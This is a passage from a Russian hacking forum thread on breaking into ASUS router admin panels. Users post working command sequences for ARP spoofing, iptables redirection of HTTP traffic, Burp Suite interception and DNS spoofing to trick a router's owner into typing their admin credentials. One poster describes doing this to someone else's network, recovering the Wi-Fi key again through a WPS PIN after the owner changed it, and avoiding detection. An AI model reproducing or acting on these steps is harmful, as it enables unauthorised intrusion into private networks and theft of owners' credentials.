Новая уязвимость в точках ASUS

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Vikhedgehog, 2 Apr 2014.

  1. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    551
    Likes Received:
    3,190
    Reputations:
    113
    Да
    YWRtaW46MTIzNDU%3D => URL decode => Base64 decode => admin:12345
     
  2. Slayer

    Slayer New Member

    Joined:
    5 Nov 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Спс +, буду дальше копать :). Остался один неясный момент по поводу перенаправления в админку роутера..
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,819
    Likes Received:
    7,064
    Reputations:
    90
    Добавлять заголовок ко всем HTTP ответам:
    Code:
    Location: http://192.168.1.1/
    
    base64(login + ':' + password), практически как Basic Authentication.
     
    Slayer likes this.
  4. VasiliyP

    VasiliyP Active Member

    Joined:
    30 Aug 2011
    Messages:
    156
    Likes Received:
    175
    Reputations:
    3
    Вам немножко не повезло с роутером - у этого аутентификация через вэб-форму, незаметно клиент логин+пароль не отдаст. Поднимите свой сервер с "WWW-Authenticate". Далее - нужен "transparent proxy". Весь трафик на 80 порт от клиента перенаправляете на него, при помощи iptables. А в прокси - уже можно менять содержимое вэб страничек. И можно в страничку вставить фрейм со ссылкой на свой сервер с "WWW-Authenticate". У клиента при этом будет выскакивать окошко с требованием пары логин+пароль. Может кто еще чего-нибудь попроще предложит.
     
    dragonking and Slayer like this.
  5. Slayer

    Slayer New Member

    Joined:
    5 Nov 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Всем спс, буду пробовать.
     
  6. Slayer

    Slayer New Member

    Joined:
    5 Nov 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Решил попробовать Burp Suite, сорри за навязчивость - если не сложно, не могли бы указать на ошибку, что делаю не так? С самого начала, по шагам, дабы сразу отмести лишнее (атакующий комп на обычном Арче, адаптер DWA-582):

    Ip-форвардинг:
    echo "1" >/proc/sys/net/ipv4/ip_forward

    Проверка:
    cat /proc/sys/net/ipv4/ip_forward
    1

    Перенаправление трафика на порт 8080:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    Проверка:

    iptables-save
    # Generated by iptables-save v1.6.1 on Wed Jul 12 22:37:29 2017
    *nat
    :pREROUTING ACCEPT [331:37006]
    :INPUT ACCEPT [204:13801]
    :OUTPUT ACCEPT [794:48797]
    :pOSTROUTING ACCEPT [1081:80910]
    -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080
    COMMIT
    # Completed on Wed Jul 12 22:37:29 2017

    Смена МАС атакующей карты (macchanger), запуск суппликанта, получение ip по dhcp, подключение своего планшета на андройде к атакуемому роутеру по wi-fi для теста.

    ARP-спуфинг:

    arpspoof -i wls32 -t 192.168.1.70 192.168.1.1

    Проверка АРП-таблицы на планшете (работа спуфинга):

    cat /proc/net/arp

    IP addres HW type Flags HW addres Mask Device
    192.168.1.63 0x1 0x2 a2:97:a2:55:53:be * wlan0
    192.168.1.1 0x1 0x2 a2:97:a2:55:53:be * wlan0

    Запуск Burp Suite, настройка:

    Proxy > Options > Proxy Listeners > Add > Specific Addres > 192.168.1.63 (Bind to port 8080) > Request Handing > Support Invisible Proxying > Ok

    Intercept > Intercept is on

    Шарманка работает, пакеты снифятся, сообщения выводятся :). Проблема в том, что так и не получилось перенаправить запросы клиента (мой тестовый андройд) в админку роутера, что делаю:

    Добавляю правило:

    Proxy > Options > Match and Replace > Add >
    Type: Responce Header
    Match: оставляю пустым
    Replace: Location: http://192.168.1.1/
    > Ok

    После добавления правила ко всем заголовкам ответов добавляется Location: http://192.168.1.1/ - видно в выводе модифицированных ответов, но планшет как ходил нормально на все сайты, так и ходит :) - ничего не меняется. Поясните плз, что делаю не так - собственных мыслей уже не осталось.
     
  7. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,819
    Likes Received:
    7,064
    Reputations:
    90
    По HTTPS сайтам планшет ходит?
     
    Slayer likes this.
  8. Slayer

    Slayer New Member

    Joined:
    5 Nov 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Да, мэйл.ру, гугл, яндекс, и т.д..
     
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,819
    Likes Received:
    7,064
    Reputations:
    90
    Ну так в SSL/TLS он подменить заголовки не сможет, без подмены сертификата. Я надеюсь, вы это понимаете? :)

    Тестируйте на сайтах без HTTPS.
     
    Slayer likes this.
  10. Slayer

    Slayer New Member

    Joined:
    5 Nov 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Спасибо большое, понял куда копать, о чём речь в общем понимаю (кодировка трафика), но с темой пока знаком поверхностно, не сразу становятся видны тонкости :), мне в общем и нужен был такой ответ - общее направление, дальше надеюсь разберусь. Видимо по этому когда пробовал ettercap, браузер андройда ругался на сертефикаты :) - видимо аллинклюдед, но чтобы понять где подводные камни (заставить всё работать), IMHO лучше начинать с более примитивного софта вроде arpspoof, когда работа видна в консоли, и программа выполняет единственную необходимую функцию. В общем спасибо, буду дальше учиться.
     
    #50 Slayer, 13 Jul 2017
    Last edited: 18 Jul 2017
  11. Slayer

    Slayer New Member

    Joined:
    5 Nov 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Всё-же не получается заставить клиента зайти в админку роутера с помощью автоматического добавления Location: http://192.168.1.1/ в заголовки ответов (пробовал на не шифрованном http), клиент упорно заходит на необоходимую ему страницу :). Разобрался немного (на уровне нуба) с Burp Suite, получилось таки заставить вручную. Клиент с роутером при входе в админку обменивается 4-мя запросами-ответами, во втором ответе роутер шлёт страницу входа. При помощи интерцептера (когда можно на лету вручную редактировать запросы-отвееты - они приостанавливаются, и отправляются вручную), когда клиенту идёт страница, полностью меняю её на страницу роурера - она грузится у клиента, дальше отбрасываю 2-3 следующих запроса клиента - у клиента на экране остаётся загруженная страница админки, т.е. если ввести в неё логин-пароль, они придут. Только так получилось, но хоть что-то :). Правда атакуемый оказался не прост, не хочет слать логин-пароль :).

    Хотел задать вопрос не совсем по теме - хочу АРП-спуфинг производить на роутере, а Burp Suite использовать в Windows (иногда необходимо, да и роутер лучше ловит сигнал - больше точек видит) - на роутере (OpenWRT) почти получилось заставить всё работать - хотел спросить, возможно ли перенаправить траффик с роутера на комп, чтобы прокси Burp Suite работал на компе, и перехватывал траффик, т.е. такое возможно?
     
    #51 Slayer, 18 Jul 2017
    Last edited: 18 Jul 2017
  12. Slayer

    Slayer New Member

    Joined:
    5 Nov 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Таки получилось отправить все запросы клиента в админку роутера при помощи iptables, хотел описать процесс настройки, может кому пригодится, и задать ещё вопрос в связи с этим.

    1. Сбрасываем все правила фаервола (делал на роутере OpenWRT, актуально для любой Linux-платформы, дабы не мешались, и не блокировали трафик):

    iptables -P INPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -F
    iptables -X
    iptables -t nat -F
    iptables -t nat -X
    iptables -t mangle -F
    iptables -t mangle -X
    iptables -t raw -F
    iptables -t raw -X

    Это безопасно, т.к. назначается действие по умолчанию ACCEPT для входящего, транслируемого и исходящего трафика, изменения никуда не сохраняются, т.е. в случае возникновения проблем - просто перезагрузка. Для ArchLinux можно этого не делать, там всё девственно-чисто по-умолчанию. Можно команды добавить в скрипт для оптимизации процесса.

    2. Форвардинг пакетов, если настраиваем не роутер (в роутерах по-умолчанию уже есть), операция временная, после перезагрузки сбросится:

    echo "1" >/proc/sys/net/ipv4/ip_forward

    3. Маскарадинг (чтобы сетевые машины могли выходить в сеть):

    iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

    4. Смена целевого адреса в заголовках пакетов клиентов (в т.ч. тех устройств, которые будем спуфить в дальнейшем):

    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1

    Т.е. все запросы с 80-го порта (http) для любого устройства будут перенаправляться в админку роутера 192.168.1.1, т.е. любой запрос по http вызовет загрузку у атакуемого (кого будем спуфить) страницы админки роутера.

    5. Собственно арп-спуф цели (192.168.1.150):

    arpspoof -i wlan0 -t 192.168.1.150 192.168.1.1

    -----

    Это работает не со всеми роутерами, с ASUS вполне, пробовал на БилайнСмартБокс - ошибка соединения.

    -----

    Ну и вопрос: почему это работает не со всеми роутерами, и возможно ли каким-нибудь образом так-же перенаправить https - запросы? Т.е. вышеописанный способ вызывает загрузку страницы админки только для http - запросов, https запрос спокойно идёт куда ему надо. Пробовал добавлять правило для порта 443, при запросе с тестового планшета - ошибка соединения, что естественно, т.к. страница админки на 80 порту. Если возможно, было-бы здорово в виде примера команды.
     
    #52 Slayer, 4 Aug 2017
    Last edited: 5 Aug 2017
  13. bukm40

    bukm40 New Member

    Joined:
    26 Apr 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Добрый день. Нужна помощь спецов) Вобщем есть роутер ASUS RT-N12E....есть подключение по wi-fi... нужен доступ в админку..... с помощью программ упомянутых в начале этой темы узнать логин\пароль неполучается...... Есть какието еще варианты получить доступ к админке?
    Спасибо заранее)
     
  14. RomanxD

    RomanxD Member

    Joined:
    11 Jun 2012
    Messages:
    107
    Likes Received:
    71
    Reputations:
    1
    DNS Spoofing и Wireshark.
     
  15. kuz

    kuz Active Member

    Joined:
    10 Jun 2015
    Messages:
    340
    Likes Received:
    192
    Reputations:
    1
    Интересно, как днс спуф поможет узнать пароль админки, есть конкретная пошаговая инструкция ?
     
  16. RomanxD

    RomanxD Member

    Joined:
    11 Jun 2012
    Messages:
    107
    Likes Received:
    71
    Reputations:
    1
    Переводишь все запросы на ип роутера и ждёшь пока хозяин он непонятки введёт данные. Можешь на свой сервер с какой нить ошибкой отправить, а потом на роутер. СИ примени.
     
  17. bukm40

    bukm40 New Member

    Joined:
    26 Apr 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    мда... с моими скудными познаниями без подробной инструкции не обойтись...(
     
  18. kuz

    kuz Active Member

    Joined:
    10 Jun 2015
    Messages:
    340
    Likes Received:
    192
    Reputations:
    1
    "Данные" - это логин\пасс к вебморде роутера ? Да фиг он будет их вводить, вероятность околонулевая, максимум будет включать\выключать\ребутить. Ну разве что ждать, если позвонит в саппорт, сбросит на дефолт и ... опять сцука установит свой тридцатизначный кривой пасс))
     
    Veil likes this.
  19. Slayer

    Slayer New Member

    Joined:
    5 Nov 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Как выше писали - днс-спуфинг (на форуме есть описание), и таки можно заставить ввести логин-пароль. Я делал при помощи dnsspoof, burpsuite и ip-tables. Т.е. в таком деле пошаговая инструкция вряд ли поможет (т.е. она есть на форуме) - придётся изучить вопрос, дабы хоть немного понять суть процессов (MITM-атака), т.к. в противном случае всё просто не будет работать из-за какой-нибудь мелочи. Т.е. в идеале нужно понимать, как настраивать правила фаервола в linux при помощи ip-tables, дабы трафик ходил откуда нужно и куда нужно после применения спуфинга, и не блокировался, потом применить снифер с фильтром, или прокси-сервер с возможностью модификации трафика. В общем если нуб в этом вопросе, как я :) придётся много чего прочитать.
     
  20. Slayer

    Slayer New Member

    Joined:
    5 Nov 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Я так сделал - первым правилом ip-tables блокировал https-трафик (это нужно было, т.к. если перенаправить все на 80 порт атакующего компа, burpsuite начинал себя странно вести - блокировал http-запросы), вторым правилом - трафик с 80 порта на 8080, на котором burpsuite, в burpsuite в настройке прокси есть возможность так-же перенаправлять все запросы на нужный ip - указал адрес админки атакуемого роутера. В итоге при https-запросах атакуемый видел ошибку подключения, при http - заходил в админку. Пока не заблокировал https, так и не заработало, дело в burpsuite, но в чём конкретно не понял. После нескольких часов атаки получил таки пароль (нужно сказать не сразу, человек видимо чувствовал, что что-то не так, скорее всего просто надоело лицезреть админку при всех запросах). После того, как пришёл пароль, зашёл в админку посмотреть на результат :), почти сразу-же роутер вырубили, на следующий день пароль wpa, как и пароль от админки сменили. Благо был wps-пин, через который вытащил снова пароль wpa, и снова пришлось доставать человека mitm-атакой. Когда второй раз заходил в админку, увидел, что левое подключение в этой прошивке - это сплошное палево, т.к. на первой странице отображается список клиентов большими буквами с именем хоста и mac :), т.е. в идеале нужно маскироваться под клиента владельца роутера, дабы не наводить панику. Так же, если кто-то зашёл в админку, и в процессе второй человек так-же попытается войти, ему будет большое сообщение "такой-то ip уже выполнил вход, вы не сможете войти" - т.е. нужно аккуратно. В общем гемморой, но можно при желании.
     
    #60 Slayer, 9 Aug 2017
    Last edited: 14 Aug 2017
Loading...